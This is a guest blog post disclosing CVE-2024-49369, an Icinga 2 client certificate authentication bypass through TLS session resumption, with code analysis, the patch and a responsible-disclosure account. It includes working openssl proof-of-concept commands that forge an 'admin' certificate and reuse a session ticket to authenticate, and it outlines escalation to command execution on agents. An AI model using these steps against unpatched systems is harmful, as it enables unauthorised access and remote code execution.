Uncovering a Client Certificate Verification Bypass in Icinga

by Guest Author | Nov 26, 2024

This is a guest blogpost from Finn Steglich.

As of Icinga 2 versions 2.14.3, 2.13.10, 2.12.11, and 2.11.12 from 12th November 2024, a critical security issue affecting Icinga 2 Masters, Satellites and Agents has been addressed. Now we’d like to release some more details on the actual vulnerability, which was issued CVE-2024-49369.

If you have not yet updated Icinga in your environment, you should stop reading this blog post and do so immediately.

Motivation

As a penetration tester and security researcher, I’ve seen Icinga installations in several company networks. There is the characteristic TCP port 5665 that shows up in portscans, there is encrypted traffic in network captures, and on the systems with active monitoring, there is very often a service running. In many environments, a lot of interesting target systems are monitored with Icinga agents. And thus an attack against the Icinga infrastructure itself becomes a lucrative target for attackers.

I have probably done some basic blackbox tests against Icinga services before. And I definitively had a man-in-the-middle attack setup in a prior engagement. But Icinga passed all of these typical attacks with flying colors. The mutual TLS authentication of the internal APIs, combined with up-to-date crypto libraries, strong default configurations and its own managed certificate authority built into the Icinga solution gave little to no room for security relevant findings.

Thus, when I circled back to Icinga this time around, I took a deeper dive into the source code, looked at the routines for the communication protocol and most importantly the authentication of connections. And I found an irregularity that turned out to be a critical vulnerability.

Certificate Authentication in Icinga

If you login to the Icinga API service with a client certificate (which can be configured for the REST API but is also the only authentication used by the internal JSON-RPC communication), the application will at some point test, whether your certificate is valid and trusted and thus provide you with access.

To do that, the function UnbufferedAsioTlsStream::IsVerifyOK will be called which, on its own, is very simple (lib/base/tlsstream.cpp):

bool UnbufferedAsioTlsStream::IsVerifyOK() const
{
    return m_VerifyOK;
}

If we check where the member field m_VerifyOK is modified, there are only two locations:

1. the constructor that initializes the value (lib/base/tlsstream.hpp):

inline
UnbufferedAsioTlsStream(UnbufferedAsioTlsStreamParams& init)
    : AsioTcpTlsStream(init.IoContext, init.SslContext), m_VerifyOK(true), m_Hostname(init.Hostname)
{
}

2. a registered callback for the TLS handshake (lib/base/tlsstream.cpp):

set_verify_callback([this](bool preverified, ssl::verify_context& ctx) {
    if (!preverified) {
        m_VerifyOK = false;

        // [...]
    }

    return true;
});

My interest was piqued why the value was initialized with true, which would indicate a successful verification of the client certificate. Typical fail-secure coding patterns would recommend seeing every connection as untrusted until properly verified, not the other way around. But there is a reason for that…

TLS Verification Callbacks

The underlying TLS library OpenSSL already implements most of the certificate verification but gives programmers full control over how to handle the results. The boost libraries that Icinga uses build on that, but also allow for further fine tuning. One of the most used options are verification callbacks.

To use this option, you first register a callback function before the TLS handshake. During the handshake, the TLS stack will then call this function whenever there are peer certificate verification results. The TLS stack includes the result of its own certificate verification as the preverified argument to this callback.

Most likely there are several callbacks, at least one for each certificate layer. You will get, for instance, one that checked the certificate of the Certificate Authority (CA), then another one that checked the leaf certificate of the peer. If at least one of the preverified results in any of the callbacks is false, that means that you normally cannot trust the peer certificate. Imagine for instance they send a valid CA indication, but the signature of the leaf certificate is faulty, which would indicate a spoofed certificate. Or they used a self-signed certificate, in which case the CA (which is the same as the leaf certificate) cannot be trusted.

And that is most likely the reason, why Icinga developers initialized the m_VerifyOK with true and unset it if a single callback is unverified.

However, I was still thinking, what if we can for some reason not cause any callbacks to happen? In that case, m_VerifyOK stays true, and the connection is trusted even if there is maybe no reason to do so.

A simple way to not have callbacks is to not provide a peer certificate in the TLS handshake. However, Icinga developers thought of that and only check the function IsVerifyOK if there actually was a peer certificate during the handshake.

And if there is a peer certificate, surely it always is verified by the TLS stack, which results in callbacks, right? And then I thought of TLS session resumption…

TLS Session Resumption

TLS handshakes are computationally expensive. That is why TLS offers an option to resume existing sessions, reuse the existing key material and skip most of the handshake. Technically there are two variants (session ID and session ticket, sometimes called stateful and stateless), both are supported by the boost libraries that Icinga uses.

Part of the handshake that is skipped during session resumption is the certificate verification. The results from the initial connection are still stored in the session cache (or ticket), and the peer cannot change certificates in a resumed session, because previously negotiated keys are re-used.

That means, that in a resumed session, no certificate verification callbacks will happen and Icinga will believe that the connection is always trusted. So far the theory, let’s test this!

Proof of Concept

Let’s assume we know of an API user with certificate authentication and the relevant Common Name (CN) for their certificate (/etc/icinga2/conf.d/api-users.conf):

object ApiUser "admin" {
    client_cn = "admin"
    permissions = [ "*" ]
}

We can now create a self-signed certificate for the relevant CN:

$ openssl req -nodes -new -x509 -keyout ./fake-admin-cert.key -out ./fake-admin-cert.crt -subj "/CN=admin"

Of course, such a certificate would not be trusted by Icinga, since it is not signed by the built-in CA. Let’s still try to connect to the API with it:

$ echo -ne 'GET /v1 HTTP/1.1\r\nHost: 192.168.29.134:5665\r\n\r\n' | openssl s_client -connect 192.168.29.134:5665 -cert ./fake-admin-cert.crt -key ./fake-admin-cert.key -ign_eof -sess_out session.txt
[...]
New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
[...]
HTTP/1.1 401 Unauthorized
Server: Icinga/v2.14.0-308-g5e9e0bbcd
WWW-Authenticate: Basic realm="Icinga 2"
Connection: close
Content-Type: text/html
Content-Length: 58

<h1>Unauthorized. Please check your user credentials.</h1>

The TLS handshake will trigger two callbacks to the verify routine, and one of them will set m_VerifyOK to false (due to verify error 18 = X509_V_ERR_DEPTH_ZERO_SELF_SIGNED_CERT in the OpenSSL verification).

This is from the service log:

[2024-10-13 18:26:02 +0200] information/ApiListener: New client connection for identity 'admin' from [::ffff:192.168.29.128]:47026 (certificate validation failed: code 18: self-signed certificate)
[2024-10-13 18:26:02 +0200] warning/HttpServerConnection: Unauthorized request: GET /v1
[2024-10-13 18:26:02 +0200] information/HttpServerConnection: Request GET /v1 (from [::ffff:192.168.29.128]:47026), user: , agent: , status: Unauthorized) took 0ms.
[2024-10-13 18:26:02 +0200] information/HttpServerConnection: HTTP client disconnected (from [::ffff:192.168.29.128]:47026)

So far, so good. However, since we got a TLS connection (which happens because the callback function always returns true and Icinga thus accepts invalid certificates to allow new Icinga nodes to request a certificate from the Icinga CA), we were able to store the session ticket (see parameter -sess_out above).

With that session ticket, we now trigger a new connection (using -sess_in instead of -sess_out, -cert and -key parameters are not required anymore since the client certificate is already part of the initial connection):

$ echo -ne 'GET /v1 HTTP/1.1\r\nHost: 192.168.29.134:5665\r\n\r\n' | openssl s_client -connect 192.168.29.134:5665 -ign_eof -sess_in session.txt
[...]
Reused, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
[...]
HTTP/1.1 200 OK
Server: Icinga/v2.14.0-308-g5e9e0bbcd
Content-Type: text/html
Content-Length: 365

<html><head><title>Icinga 2</title></head><h1>Hello from Icinga 2 (Version: v2.14.0-308-g5e9e0bbcd)!</h1><p>You are authenticated as <b>admin</b>. Your user has the following permissions:</p> <ul><li>*</li></ul><p>More information about API requests is available in the <a href="https://icinga.com/docs/icinga2/latest/" target="_blank">documentation</a>.</p></html>

The TLS session is marked as “Reused”, and there will be no callbacks to the verify routine (because the TLS stack assumes that the verification already happened in the initial connection). Thus m_VerifyOK is still true, and we are successfully authenticated.

Again the service log:

[2024-10-13 18:26:38 +0200] information/ApiListener: New client connection for identity 'admin' from [::ffff:192.168.29.128]:58102 (no Endpoint object found for identity)
[2024-10-13 18:26:38 +0200] information/HttpServerConnection: Request GET /v1 (from [::ffff:192.168.29.128]:58102), user: admin, agent: , status: OK) took 0ms.
[2024-10-13 18:26:48 +0200] information/HttpServerConnection: No messages for HTTP connection have been received in the last 10 seconds.
[2024-10-13 18:26:48 +0200] information/HttpServerConnection: HTTP client disconnected (from [::ffff:192.168.29.128]:58102)

We successfully bypassed the certificate authentication and are now logged in to the REST API with an arbitrary spoofed user and a fake certificate.

Considerations for an Attack

We assumed that the REST API is configured to allow certificate authentication with a specific CN. In real-word attacks, the attacker might not know the CN for an API user, but common names are rarely a secret, so they might be able to guess. Also, if they have a limited, read-only API user, they might be able to list the ApiUser objects and their CNs.

Since there are no REST API users by default, many default installation systems might still be secure against such an attack. Especially agent endpoints will most likely not have REST API users.

However, the same attack works against the internal JSON-RPC API. We would need to spoof a parent node to any endpoint (probably using the hostname or FQDN as CN). Then we can update a CheckCommand object and execute the command and thus execute arbitrary commands on the endpoint, as long as configuration updates and command execution are enabled.

If a connection with a specific parent node already exists, Icinga will not allow a second one, so an attacker has to either wait for the next reload or configuration deployment, or trigger outages or network connection disruptions in other ways to get a successful connection.

Impact of the Vulnerability

Depending on the REST API configuration, attackers might in many environments gain full permissions on the API on master endpoints which might allow compromise of the entire Icinga environment.

If configuration and command execution is enabled on an endpoint (which is default for monitored nodes with Icinga agents), a JSON-RPC connections from a spoofed parent node allows an attacker to update the endpoint configuration and execute arbitrary commands on the endpoint. Depending on the configured service user, that might already provide full system compromise in some cases, or limited access in others.

Even if configuration and command execution is not enabled, attackers might still learn sensitive information by, for instance, listening to the results of checks on the endpoint.

Mitigation

Once I notified the Icinga team about the security issue, they quickly started to build and test a patch for the issue.

Instead of storing the verification result in UnbufferedAsioTlsStream, the function IsVerifyOK was instead changed to request the underlying result from the OpenSSL library (lib/base/tlsstream.cpp):

bool UnbufferedAsioTlsStream::IsVerifyOK()
{
    if (!SSL_is_init_finished(native_handle())) {
        // handshake was not completed
        return false;
    }

    if (GetPeerCertificate() == nullptr) {
        // no peer certificate was sent
        return false;
    }

    return SSL_get_verify_result(native_handle()) == X509_V_OK;
}

The use of the function SSL_get_verify_result ensures that even in resumed sessions, the cached verification result of the initial handshake is used.

With the releases 2.14.3, 2.13.10, 2.12.11, and 2.11.12, this patch has been included in Icinga, closing the vulnerability. If you still have not updated, you now know why you should do so immediately!

Final Remarks

Overall, I think this vulnerability is interesting because it shows how a few decisions than on their own sound reasonable (initialization and unsetting of the m_VerifyOK variable, allowing connections with untrusted certificates, and TLS session resumption), when combined might expose an ecosystem to a critical vulnerability.

I like to thank the Icinga team for their fast and professional approach in dealing with my initial vulnerability report. They not only found a solid patch, tested, build, and released it for so many platforms including discontinued end-of-life distributions, but they also could point me to some TLS internals, that I could not quite rationalize while discussing the details.

In my opinion, the open discussion of vulnerabilities (in form of responsible disclosure processes and lessons-learned sessions) is crucial for the maturity of projects and the security community in general. By sharing findings, methods, ways of thinking, and approaches to bug hunting and mitigation, we foster a collaborative environment, that security researchers, vulnerability analysts, and developers can use to their advantage. By providing insights in the processes and even proof-of-concepts, we allow others to reproduce our results, test the security of their own environments and gain awareness for the challenges in security. I like to again thank everyone involved in the discovery, mitigation, and disclosure process!